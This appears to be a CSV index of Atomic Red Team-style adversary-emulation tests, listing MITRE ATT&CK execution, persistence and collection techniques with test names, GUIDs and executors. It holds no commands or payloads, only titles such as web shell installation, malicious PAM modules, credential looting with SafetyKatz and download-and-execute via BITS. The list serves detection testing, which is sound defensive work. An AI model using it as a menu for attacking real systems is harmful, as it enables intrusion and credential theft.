execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,bash
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Create Account: Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Create Account: Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Create Account: Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
persistence,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
